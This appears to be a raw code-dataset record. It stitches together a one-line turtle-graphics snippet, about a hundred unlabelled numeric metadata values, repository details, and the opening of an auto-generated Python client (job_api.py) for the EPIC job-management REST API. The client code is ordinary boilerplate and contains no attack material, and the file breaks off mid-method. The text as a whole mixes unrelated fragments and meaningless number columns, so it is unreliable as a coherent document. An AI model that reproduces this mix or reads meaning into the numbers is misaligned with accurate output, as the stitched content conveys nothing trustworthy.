artist.color = artist.random_color() artist.move_forward(100) artist.move_backward(100) artist.turn_right(45) artist.check()
24.183673
58
0.795781
185
1,185
4.924324
0.275676
0.193194
0.149287
0.201976
0.7618
0.7618
0.7618
0.7618
0.7618
0.7618
0
0.065438
0.084388
1,185
48
59
24.6875
0.774194
0.150211
0
0.842105
0
0
0.011011
0
0
0
0
0
0
1
0
false
0
0.052632
0
0.052632
0
0
0
0
null
0
0
1
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c3195c5315af5c91144e68acebda861718e6c514
55,599
py
Python
epiccore/api/job_api.py
zenotech/python_epic_api
2eaefc98fefc1d7fff46ba1b7ce6e4019d6d7386
[ "FTL" ]
null
null
null
epiccore/api/job_api.py
zenotech/python_epic_api
2eaefc98fefc1d7fff46ba1b7ce6e4019d6d7386
[ "FTL" ]
null
null
null
epiccore/api/job_api.py
zenotech/python_epic_api
2eaefc98fefc1d7fff46ba1b7ce6e4019d6d7386
[ "FTL" ]
null
null
null
# coding: utf-8 """ EPIC API REST API for interacting with EPIC (https://epic.zenotech.com) services. <br /> Please note this API is in BETA and does not yet contain all EPIC functionality. # noqa: E501 The version of the OpenAPI document: v2 Contact: support@zenotech.com Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from epiccore.api_client import ApiClient from epiccore.exceptions import ( # noqa: F401 ApiTypeError, ApiValueError ) class JobApi(object): """NOTE: This class is auto generated by OpenAPI Generator Ref: https://openapi-generator.tech Do not edit the class manually. """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def job_auth_read(self, id, **kwargs): # noqa: E501 """job_auth_read # noqa: E501 Get the authorisation status for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_auth_read(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
:rtype: JobAuthStatus """ kwargs['_return_http_data_only'] = True return self.job_auth_read_with_http_info(id, **kwargs) # noqa: E501 def job_auth_read_with_http_info(self, id, **kwargs): # noqa: E501 """job_auth_read # noqa: E501 Get the authorisation status for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_auth_read_with_http_info(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
:rtype: tuple(JobAuthStatus, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_auth_read" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_auth_read`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/auth/', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='JobAuthStatus', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_auth_update(self, id, data, **kwargs): # noqa: E501 """job_auth_update # noqa: E501 Update the authorisation status for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_auth_update(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: JobAuthStatus :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: JobAuthStatus """ kwargs['_return_http_data_only'] = True return self.job_auth_update_with_http_info(id, data, **kwargs) # noqa: E501 def job_auth_update_with_http_info(self, id, data, **kwargs): # noqa: E501 """job_auth_update # noqa: E501 Update the authorisation status for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_auth_update_with_http_info(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: JobAuthStatus :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. 
It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(JobAuthStatus, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id', 'data' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_auth_update" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_auth_update`") # noqa: E501 # verify the required parameter 'data' is set if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501 local_var_params['data'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `data` when calling `job_auth_update`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in local_var_params: body_params = local_var_params['data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: 
E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/auth/', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='JobAuthStatus', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_cancel(self, id, data, **kwargs): # noqa: E501 """job_cancel # noqa: E501 Cancel a job # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_cancel(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: object :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: None """ kwargs['_return_http_data_only'] = True return self.job_cancel_with_http_info(id, data, **kwargs) # noqa: E501 def job_cancel_with_http_info(self, id, data, **kwargs): # noqa: E501 """job_cancel # noqa: E501 Cancel a job # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_cancel_with_http_info(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: object :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
:rtype: None """ local_var_params = locals() all_params = [ 'id', 'data' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_cancel" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_cancel`") # noqa: E501 # verify the required parameter 'data' is set if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501 local_var_params['data'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `data` when calling `job_cancel`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in local_var_params: body_params = local_var_params['data'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/cancel/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), 
collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_create(self, data, **kwargs): # noqa: E501 """job_create # noqa: E501 Create a new job bssased on the submitted job specification. App and Queue codes can be retreived from the catalog endpoints. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_create(data, async_req=True) >>> result = thread.get() :param data: (required) :type data: JobArraySpec :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: list[Job] """ kwargs['_return_http_data_only'] = True return self.job_create_with_http_info(data, **kwargs) # noqa: E501 def job_create_with_http_info(self, data, **kwargs): # noqa: E501 """job_create # noqa: E501 Create a new job bssased on the submitted job specification. App and Queue codes can be retreived from the catalog endpoints. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_create_with_http_info(data, async_req=True) >>> result = thread.get() :param data: (required) :type data: JobArraySpec :param async_req: Whether to execute the request asynchronously. 
:type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(list[Job], status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'data' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_create" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'data' is set if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501 local_var_params['data'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `data` when calling `job_create`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in local_var_params: body_params = local_var_params['data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = 
self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[Job]', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_list(self, **kwargs): # noqa: E501 """job_list # noqa: E501 List the jobs instances in EPIC # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_list(async_req=True) >>> result = thread.get() :param limit: Number of results to return per page. :type limit: int :param offset: The initial index from which to return the results. :type offset: int :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
:rtype: InlineResponse2006 """ kwargs['_return_http_data_only'] = True return self.job_list_with_http_info(**kwargs) # noqa: E501 def job_list_with_http_info(self, **kwargs): # noqa: E501 """job_list # noqa: E501 List the jobs instances in EPIC # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_list_with_http_info(async_req=True) >>> result = thread.get() :param limit: Number of results to return per page. :type limit: int :param offset: The initial index from which to return the results. :type offset: int :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
:rtype: tuple(InlineResponse2006, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'limit', 'offset' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_list" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501 query_params.append(('limit', local_var_params['limit'])) # noqa: E501 if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501 query_params.append(('offset', local_var_params['offset'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='InlineResponse2006', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_partial_update(self, id, data, **kwargs): # noqa: E501 """job_partial_update # noqa: E501 Update the job options for job instance with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_partial_update(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: JobAppOptions :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: JobAppOptions """ kwargs['_return_http_data_only'] = True return self.job_partial_update_with_http_info(id, data, **kwargs) # noqa: E501 def job_partial_update_with_http_info(self, id, data, **kwargs): # noqa: E501 """job_partial_update # noqa: E501 Update the job options for job instance with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_partial_update_with_http_info(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: JobAppOptions :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. 
It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(JobAppOptions, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id', 'data' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_partial_update" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_partial_update`") # noqa: E501 # verify the required parameter 'data' is set if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501 local_var_params['data'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `data` when calling `job_partial_update`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in local_var_params: body_params = local_var_params['data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # 
noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/', 'PATCH', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='JobAppOptions', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_quote(self, data, **kwargs): # noqa: E501 """job_quote # noqa: E501 Provides a price quote based upon the given BatchJobLaunchSpec. Quotes will be returned for clusters that the user/team has permission to use and that support the requested application, task distribution and runtime. When submitting multiple steps in a the job specification then the task reference may be used to identify individual steps. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_quote(data, async_req=True) >>> result = thread.get() :param data: (required) :type data: JobSpec :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
:rtype: JobQuote """ kwargs['_return_http_data_only'] = True return self.job_quote_with_http_info(data, **kwargs) # noqa: E501 def job_quote_with_http_info(self, data, **kwargs): # noqa: E501 """job_quote # noqa: E501 Provides a price quote based upon the given BatchJobLaunchSpec. Quotes will be returned for clusters that the user/team has permission to use and that support the requested application, task distribution and runtime. When submitting multiple steps in a the job specification then the task reference may be used to identify individual steps. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_quote_with_http_info(data, async_req=True) >>> result = thread.get() :param data: (required) :type data: JobSpec :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
:rtype: tuple(JobQuote, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'data' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_quote" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'data' is set if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501 local_var_params['data'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `data` when calling `job_quote`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in local_var_params: body_params = local_var_params['data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/quote/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='JobQuote', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_read(self, id, **kwargs): # noqa: E501 """job_read # noqa: E501 See the details for the job instance 
with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_read(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: Job """ kwargs['_return_http_data_only'] = True return self.job_read_with_http_info(id, **kwargs) # noqa: E501 def job_read_with_http_info(self, id, **kwargs): # noqa: E501 """job_read # noqa: E501 See the details for the job instance with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_read_with_http_info(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(Job, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_read" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_read`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Job', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, 
_request_auth=local_var_params.get('_request_auth')) def job_residuals_read(self, id, **kwargs): # noqa: E501 """job_residuals_read # noqa: E501 Retreive the residuals for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_residuals_read(id, async_req=True) >>> result = thread.get() :param id: A unique integer value identifying this batch job instance. (required) :type id: int :param variables: Return data values for these variable names :type variables: list[str] :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: JobResidual """ kwargs['_return_http_data_only'] = True return self.job_residuals_read_with_http_info(id, **kwargs) # noqa: E501 def job_residuals_read_with_http_info(self, id, **kwargs): # noqa: E501 """job_residuals_read # noqa: E501 Retreive the residuals for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_residuals_read_with_http_info(id, async_req=True) >>> result = thread.get() :param id: A unique integer value identifying this batch job instance. (required) :type id: int :param variables: Return data values for these variable names :type variables: list[str] :param async_req: Whether to execute the request asynchronously. 
:type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(JobResidual, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id', 'variables' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_residuals_read" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the 